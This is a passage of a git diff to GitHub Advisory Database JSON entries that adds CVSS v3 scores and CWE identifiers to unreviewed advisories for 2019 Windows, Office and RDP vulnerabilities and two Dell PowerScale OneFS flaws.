b/advisories/unreviewed/2022/05/GHSA-78hr-8953-5gh6/GHSA-78hr-8953-5gh6.json index c808be496874a..07f62478635fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-78hr-8953-5gh6/GHSA-78hr-8953-5gh6.json +++ b/advisories/unreviewed/2022/05/GHSA-78hr-8953-5gh6/GHSA-78hr-8953-5gh6.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-78hr-8953-5gh6", - "modified": "2022-05-24T16:53:31Z", + "modified": "2026-02-20T21:31:10Z", "published": "2022-05-24T16:53:31Z", "aliases": [ "CVE-2019-1183" ], "details": "A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka 'Windows VBScript Engine Remote Code Execution Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-7j76-3f62-vcf8/GHSA-7j76-3f62-vcf8.json b/advisories/unreviewed/2022/05/GHSA-7j76-3f62-vcf8/GHSA-7j76-3f62-vcf8.json index c979aed6b8141..587bf0412c412 100644 --- a/advisories/unreviewed/2022/05/GHSA-7j76-3f62-vcf8/GHSA-7j76-3f62-vcf8.json +++ b/advisories/unreviewed/2022/05/GHSA-7j76-3f62-vcf8/GHSA-7j76-3f62-vcf8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-7j76-3f62-vcf8", - "modified": "2022-05-24T16:53:27Z", + "modified": "2026-02-20T21:31:08Z", "published": "2022-05-24T16:53:27Z", "aliases": [ "CVE-2019-0716" ], "details": "A denial of service vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Denial of Service Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-7x73-763j-hw4v/GHSA-7x73-763j-hw4v.json b/advisories/unreviewed/2022/05/GHSA-7x73-763j-hw4v/GHSA-7x73-763j-hw4v.json index 3c0f6901881e5..7d3daf103742c 100644 --- a/advisories/unreviewed/2022/05/GHSA-7x73-763j-hw4v/GHSA-7x73-763j-hw4v.json +++ b/advisories/unreviewed/2022/05/GHSA-7x73-763j-hw4v/GHSA-7x73-763j-hw4v.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-7x73-763j-hw4v", - "modified": "2022-05-24T16:53:28Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:28Z", "aliases": [ "CVE-2019-1144" ], "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1145, CVE-2019-1149, CVE-2019-1150, CVE-2019-1151, CVE-2019-1152.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-415" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-89v5-wvp7-3m8g/GHSA-89v5-wvp7-3m8g.json b/advisories/unreviewed/2022/05/GHSA-89v5-wvp7-3m8g/GHSA-89v5-wvp7-3m8g.json index 1837d8099051c..052a84770a2bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-89v5-wvp7-3m8g/GHSA-89v5-wvp7-3m8g.json +++ b/advisories/unreviewed/2022/05/GHSA-89v5-wvp7-3m8g/GHSA-89v5-wvp7-3m8g.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-89v5-wvp7-3m8g", - "modified": "2022-05-24T16:53:33Z", + "modified": "2026-02-20T21:31:10Z", "published": "2022-05-24T16:53:33Z", "aliases": [ "CVE-2019-1200" ], "details": "A remote code execution vulnerability exists in Microsoft Outlook software when it fails to properly handle objects in memory, aka 'Microsoft Outlook Remote Code Execution Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-974f-9h45-g4v4/GHSA-974f-9h45-g4v4.json b/advisories/unreviewed/2022/05/GHSA-974f-9h45-g4v4/GHSA-974f-9h45-g4v4.json index 81277abe7c89e..132b2b6b60606 100644 --- a/advisories/unreviewed/2022/05/GHSA-974f-9h45-g4v4/GHSA-974f-9h45-g4v4.json +++ b/advisories/unreviewed/2022/05/GHSA-974f-9h45-g4v4/GHSA-974f-9h45-g4v4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-974f-9h45-g4v4", - "modified": "2022-05-24T19:09:53Z", + "modified": "2026-02-20T21:31:13Z", "published": "2022-05-24T19:09:53Z", "aliases": [ "CVE-2021-21553" ], "details": "Dell PowerScale OneFS versions 8.1.0-9.1.0 contain an Incorrect User Management vulnerability.under some specific conditions, this can allow the CompAdmin user to elevate privileges and break out of Compliance mode. This is a critical vulnerability and Dell recommends upgrading at the earliest.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-286" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9j6q-fhff-rr4p/GHSA-9j6q-fhff-rr4p.json b/advisories/unreviewed/2022/05/GHSA-9j6q-fhff-rr4p/GHSA-9j6q-fhff-rr4p.json index 10b0ec6f38c7c..dde386d58eae1 100644 --- a/advisories/unreviewed/2022/05/GHSA-9j6q-fhff-rr4p/GHSA-9j6q-fhff-rr4p.json +++ b/advisories/unreviewed/2022/05/GHSA-9j6q-fhff-rr4p/GHSA-9j6q-fhff-rr4p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-9j6q-fhff-rr4p", - "modified": "2022-05-24T16:53:29Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:29Z", "aliases": [ "CVE-2019-1151" ], "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1144, CVE-2019-1145, CVE-2019-1149, CVE-2019-1150, CVE-2019-1152.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c2cv-vhh7-5wqr/GHSA-c2cv-vhh7-5wqr.json b/advisories/unreviewed/2022/05/GHSA-c2cv-vhh7-5wqr/GHSA-c2cv-vhh7-5wqr.json index c6c30e30640ef..97e5b0a7acfdd 100644 --- a/advisories/unreviewed/2022/05/GHSA-c2cv-vhh7-5wqr/GHSA-c2cv-vhh7-5wqr.json +++ b/advisories/unreviewed/2022/05/GHSA-c2cv-vhh7-5wqr/GHSA-c2cv-vhh7-5wqr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c2cv-vhh7-5wqr", - "modified": "2022-05-24T16:53:33Z", + "modified": "2026-02-20T21:31:11Z", "published": "2022-05-24T16:53:33Z", "aliases": [ "CVE-2019-1204" ], "details": "An elevation of privilege vulnerability exists when Microsoft Outlook initiates processing of incoming messages without sufficient validation of the formatting of the messages, aka 'Microsoft Outlook Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-20" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c2qm-98hf-mh5x/GHSA-c2qm-98hf-mh5x.json b/advisories/unreviewed/2022/05/GHSA-c2qm-98hf-mh5x/GHSA-c2qm-98hf-mh5x.json index 121e9743a4c63..ecd57e0fc2f21 100644 --- a/advisories/unreviewed/2022/05/GHSA-c2qm-98hf-mh5x/GHSA-c2qm-98hf-mh5x.json +++ b/advisories/unreviewed/2022/05/GHSA-c2qm-98hf-mh5x/GHSA-c2qm-98hf-mh5x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c2qm-98hf-mh5x", - "modified": "2022-05-24T16:53:29Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:29Z", "aliases": [ "CVE-2019-1159" ], "details": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-1164.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-ggpr-x33h-6668/GHSA-ggpr-x33h-6668.json b/advisories/unreviewed/2022/05/GHSA-ggpr-x33h-6668/GHSA-ggpr-x33h-6668.json index 0cce3d9c27658..6346634989b9e 100644 --- a/advisories/unreviewed/2022/05/GHSA-ggpr-x33h-6668/GHSA-ggpr-x33h-6668.json +++ b/advisories/unreviewed/2022/05/GHSA-ggpr-x33h-6668/GHSA-ggpr-x33h-6668.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-ggpr-x33h-6668", - "modified": "2022-05-24T16:53:34Z", + "modified": "2026-02-20T21:31:11Z", "published": "2022-05-24T16:53:34Z", "aliases": [ "CVE-2019-1212" ], "details": "A memory corruption vulnerability exists in the Windows Server DHCP service when processing specially crafted packets, aka 'Windows DHCP Server Denial of Service Vulnerability'. This CVE ID is unique from CVE-2019-1206.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gj34-2m5p-98wq/GHSA-gj34-2m5p-98wq.json b/advisories/unreviewed/2022/05/GHSA-gj34-2m5p-98wq/GHSA-gj34-2m5p-98wq.json index 102d8981837c1..7b0a9f7ae0a9d 100644 --- a/advisories/unreviewed/2022/05/GHSA-gj34-2m5p-98wq/GHSA-gj34-2m5p-98wq.json +++ b/advisories/unreviewed/2022/05/GHSA-gj34-2m5p-98wq/GHSA-gj34-2m5p-98wq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gj34-2m5p-98wq", - "modified": "2022-05-24T16:53:29Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:29Z", "aliases": [ "CVE-2019-1156" ], "details": "A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1146, CVE-2019-1147, CVE-2019-1155, CVE-2019-1157.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-j4m7-8245-9345/GHSA-j4m7-8245-9345.json b/advisories/unreviewed/2022/05/GHSA-j4m7-8245-9345/GHSA-j4m7-8245-9345.json index 60bdddef3abaa..5f6eaab8f2bd5 100644 --- a/advisories/unreviewed/2022/05/GHSA-j4m7-8245-9345/GHSA-j4m7-8245-9345.json +++ b/advisories/unreviewed/2022/05/GHSA-j4m7-8245-9345/GHSA-j4m7-8245-9345.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j4m7-8245-9345", - "modified": "2022-05-24T17:48:05Z", + "modified": "2026-02-20T21:31:13Z", "published": "2022-05-24T17:48:05Z", "aliases": [ "CVE-2021-21526" ], "details": "Dell PowerScale OneFS 8.1.0 - 9.1.0 contains a privilege escalation in SmartLock compliance mode that may allow compadmin to execute arbitrary commands as root.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-j5jh-cv7m-3763/GHSA-j5jh-cv7m-3763.json b/advisories/unreviewed/2022/05/GHSA-j5jh-cv7m-3763/GHSA-j5jh-cv7m-3763.json index ebec35732c317..bc5bc97790141 100644 --- a/advisories/unreviewed/2022/05/GHSA-j5jh-cv7m-3763/GHSA-j5jh-cv7m-3763.json +++ b/advisories/unreviewed/2022/05/GHSA-j5jh-cv7m-3763/GHSA-j5jh-cv7m-3763.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j5jh-cv7m-3763", - "modified": "2022-05-24T16:53:31Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:31Z", "aliases": [ "CVE-2019-1176" ], "details": "An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory, aka 'DirectX Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-j5p2-jf5p-h3rm/GHSA-j5p2-jf5p-h3rm.json b/advisories/unreviewed/2022/05/GHSA-j5p2-jf5p-h3rm/GHSA-j5p2-jf5p-h3rm.json index e303f79376acf..9c8cb0fa13f97 100644 --- a/advisories/unreviewed/2022/05/GHSA-j5p2-jf5p-h3rm/GHSA-j5p2-jf5p-h3rm.json +++ b/advisories/unreviewed/2022/05/GHSA-j5p2-jf5p-h3rm/GHSA-j5p2-jf5p-h3rm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j5p2-jf5p-h3rm", - "modified": "2022-05-24T16:53:30Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:30Z", "aliases": [ "CVE-2019-1168" ], "details": "An elevation of privilege exists in the p2pimsvc service where an attacker who successfully exploited the vulnerability could run arbitrary code with elevated privileges.To exploit this vulnerability, an attacker would first have to log on to the system, aka 'Microsoft Windows p2pimsvc Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-m3wq-w5qf-gpqg/GHSA-m3wq-w5qf-gpqg.json b/advisories/unreviewed/2022/05/GHSA-m3wq-w5qf-gpqg/GHSA-m3wq-w5qf-gpqg.json index 8c6085513bff1..a8a429ebd04dd 100644 --- a/advisories/unreviewed/2022/05/GHSA-m3wq-w5qf-gpqg/GHSA-m3wq-w5qf-gpqg.json +++ b/advisories/unreviewed/2022/05/GHSA-m3wq-w5qf-gpqg/GHSA-m3wq-w5qf-gpqg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-m3wq-w5qf-gpqg", - "modified": "2022-05-24T16:53:34Z", + "modified": "2026-02-20T21:31:11Z", "published": "2022-05-24T16:53:34Z", "aliases": [ "CVE-2019-1218" ], "details": "A spoofing vulnerability exists in the way Microsoft Outlook iOS software parses specifically crafted email messages, aka 'Outlook iOS Spoofing Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-79" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-mhjc-pqhq-cf8c/GHSA-mhjc-pqhq-cf8c.json b/advisories/unreviewed/2022/05/GHSA-mhjc-pqhq-cf8c/GHSA-mhjc-pqhq-cf8c.json index ab2a610094c31..6667b7d276878 100644 --- a/advisories/unreviewed/2022/05/GHSA-mhjc-pqhq-cf8c/GHSA-mhjc-pqhq-cf8c.json +++ b/advisories/unreviewed/2022/05/GHSA-mhjc-pqhq-cf8c/GHSA-mhjc-pqhq-cf8c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-mhjc-pqhq-cf8c", - "modified": "2022-05-24T16:53:33Z", + "modified": "2026-02-20T21:31:10Z", "published": "2022-05-24T16:53:33Z", "aliases": [ "CVE-2019-1201" ], "details": "A remote code execution vulnerability exists in Microsoft Word software when it fails to properly handle objects in memory, aka 'Microsoft Word Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1205.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-p5w8-9jhp-rccp/GHSA-p5w8-9jhp-rccp.json b/advisories/unreviewed/2022/05/GHSA-p5w8-9jhp-rccp/GHSA-p5w8-9jhp-rccp.json index 92a31555f9cb7..f599062974bf7 100644 --- a/advisories/unreviewed/2022/05/GHSA-p5w8-9jhp-rccp/GHSA-p5w8-9jhp-rccp.json +++ b/advisories/unreviewed/2022/05/GHSA-p5w8-9jhp-rccp/GHSA-p5w8-9jhp-rccp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p5w8-9jhp-rccp", - "modified": "2022-05-24T16:53:27Z", + "modified": "2026-02-20T21:31:08Z", "published": "2022-05-24T16:53:27Z", "aliases": [ "CVE-2019-0736" ], "details": "A memory corruption vulnerability exists in the Windows DHCP client when an attacker sends specially crafted DHCP responses to a client, aka 'Windows DHCP Client Remote Code Execution Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-qcg4-w26w-fjv8/GHSA-qcg4-w26w-fjv8.json b/advisories/unreviewed/2022/05/GHSA-qcg4-w26w-fjv8/GHSA-qcg4-w26w-fjv8.json index 539ec13effd83..0f08b8404b667 100644 --- a/advisories/unreviewed/2022/05/GHSA-qcg4-w26w-fjv8/GHSA-qcg4-w26w-fjv8.json +++ b/advisories/unreviewed/2022/05/GHSA-qcg4-w26w-fjv8/GHSA-qcg4-w26w-fjv8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qcg4-w26w-fjv8", - "modified": "2024-06-03T18:53:39Z", + "modified": "2026-02-20T21:31:12Z", "published": "2022-05-24T22:28:54Z", "aliases": [ "CVE-2019-1226" ], "details": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services? Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1181, CVE-2019-1182, CVE-2019-1222.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-qvf2-39c6-g8rr/GHSA-qvf2-39c6-g8rr.json b/advisories/unreviewed/2022/05/GHSA-qvf2-39c6-g8rr/GHSA-qvf2-39c6-g8rr.json index 3aa0764627749..845132b159dc2 100644 --- a/advisories/unreviewed/2022/05/GHSA-qvf2-39c6-g8rr/GHSA-qvf2-39c6-g8rr.json +++ b/advisories/unreviewed/2022/05/GHSA-qvf2-39c6-g8rr/GHSA-qvf2-39c6-g8rr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qvf2-39c6-g8rr", - "modified": "2024-06-03T18:53:38Z", + "modified": "2026-02-20T21:31:11Z", "published": "2022-05-24T22:28:55Z", "aliases": [ "CVE-2019-1222" ], "details": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services? Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1181, CVE-2019-1182, CVE-2019-1226.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-qxww-2h29-62jj/GHSA-qxww-2h29-62jj.json b/advisories/unreviewed/2022/05/GHSA-qxww-2h29-62jj/GHSA-qxww-2h29-62jj.json index 314cc81ace2f1..1c4715ac98dcb 100644 --- a/advisories/unreviewed/2022/05/GHSA-qxww-2h29-62jj/GHSA-qxww-2h29-62jj.json +++ b/advisories/unreviewed/2022/05/GHSA-qxww-2h29-62jj/GHSA-qxww-2h29-62jj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qxww-2h29-62jj", - "modified": "2022-05-24T16:53:34Z", + "modified": "2026-02-20T21:31:11Z", "published": "2022-05-24T16:53:34Z", "aliases": [ "CVE-2019-1223" ], "details": "A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka 'Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-r62x-fmfh-f3x7/GHSA-r62x-fmfh-f3x7.json b/advisories/unreviewed/2022/05/GHSA-r62x-fmfh-f3x7/GHSA-r62x-fmfh-f3x7.json index e74d4ac1de2d3..e553262e02506 100644 --- a/advisories/unreviewed/2022/05/GHSA-r62x-fmfh-f3x7/GHSA-r62x-fmfh-f3x7.json +++ b/advisories/unreviewed/2022/05/GHSA-r62x-fmfh-f3x7/GHSA-r62x-fmfh-f3x7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-r62x-fmfh-f3x7", - "modified": "2022-05-24T16:53:28Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:28Z", "aliases": [ "CVE-2019-1133" ], "details": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1194.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-rq2v-5grq-h5mc/GHSA-rq2v-5grq-h5mc.json b/advisories/unreviewed/2022/05/GHSA-rq2v-5grq-h5mc/GHSA-rq2v-5grq-h5mc.json index 7c977bec75e94..753e8d49ba542 100644 --- a/advisories/unreviewed/2022/05/GHSA-rq2v-5grq-h5mc/GHSA-rq2v-5grq-h5mc.json +++ b/advisories/unreviewed/2022/05/GHSA-rq2v-5grq-h5mc/GHSA-rq2v-5grq-h5mc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rq2v-5grq-h5mc", - "modified": "2022-05-24T16:53:32Z", + "modified": "2026-02-20T21:31:10Z", "published": "2022-05-24T16:53:32Z", "aliases": [ "CVE-2019-1190" ], "details": "An elevation of privilege vulnerability exists in the way that the Windows kernel image handles objects in memory.An attacker who successfully exploited the vulnerability could execute code with elevated permissions.To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.The security update addresses the vulnerability by ensuring the Windows kernel image properly handles objects in memory., aka 'Windows Image Elevation of Privilege Vulnerability'.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-vmp9-r9rc-8gc7/GHSA-vmp9-r9rc-8gc7.json b/advisories/unreviewed/2022/05/GHSA-vmp9-r9rc-8gc7/GHSA-vmp9-r9rc-8gc7.json index 518471a77ccb8..dcb38e9d37680 100644 --- a/advisories/unreviewed/2022/05/GHSA-vmp9-r9rc-8gc7/GHSA-vmp9-r9rc-8gc7.json +++ b/advisories/unreviewed/2022/05/GHSA-vmp9-r9rc-8gc7/GHSA-vmp9-r9rc-8gc7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vmp9-r9rc-8gc7", - "modified": "2022-05-24T16:53:30Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:30Z", "aliases": [ "CVE-2019-1155" ], "details": "A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1146, CVE-2019-1147, CVE-2019-1156, CVE-2019-1157.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-vw2q-fc9j-fxwx/GHSA-vw2q-fc9j-fxwx.json b/advisories/unreviewed/2022/05/GHSA-vw2q-fc9j-fxwx/GHSA-vw2q-fc9j-fxwx.json index 84ac30f30f38d..e1b54bd1db988 100644 --- a/advisories/unreviewed/2022/05/GHSA-vw2q-fc9j-fxwx/GHSA-vw2q-fc9j-fxwx.json +++ b/advisories/unreviewed/2022/05/GHSA-vw2q-fc9j-fxwx/GHSA-vw2q-fc9j-fxwx.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vw2q-fc9j-fxwx", - "modified": "2022-05-24T16:53:28Z", + "modified": "2026-02-20T21:31:09Z", "published": "2022-05-24T16:53:28Z", "aliases": [ "CVE-2019-1149" ], "details": "A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts, aka 'Microsoft Graphics Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1144, CVE-2019-1145, CVE-2019-1150, CVE-2019-1151, CVE-2019-1152.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-787" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-vw3c-3fmq-qpgq/GHSA-vw3c-3fmq-qpgq.json b/advisories/unreviewed/2022/05/GHSA-vw3c-3fmq-qpgq/GHSA-vw3c-3fmq-qpgq.json index 986a4f7d0a780..7991dc656b2ff 100644 --- a/advisories/unreviewed/2022/05/GHSA-vw3c-3fmq-qpgq/GHSA-vw3c-3fmq-qpgq.json +++ b/advisories/unreviewed/2022/05/GHSA-vw3c-3fmq-qpgq/GHSA-vw3c-3fmq-qpgq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vw3c-3fmq-qpgq", - "modified": "2024-06-03T18:53:36Z", + "modified": "2026-02-20T21:31:10Z", "published": "2022-05-24T22:29:00Z", "aliases": [ "CVE-2019-1182" ], "details": "A remote code execution vulnerability exists in Remote Desktop Services – formerly known as Terminal Services – when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services? Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1181, CVE-2019-1222, CVE-2019-1226.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-w8p3-q4q6-xq79/GHSA-w8p3-q4q6-xq79.json b/advisories/unreviewed/2022/05/GHSA-w8p3-q4q6-xq79/GHSA-w8p3-q4q6-xq79.json index 31c6a67a490e5..f8f4b3ea313c2 100644 --- 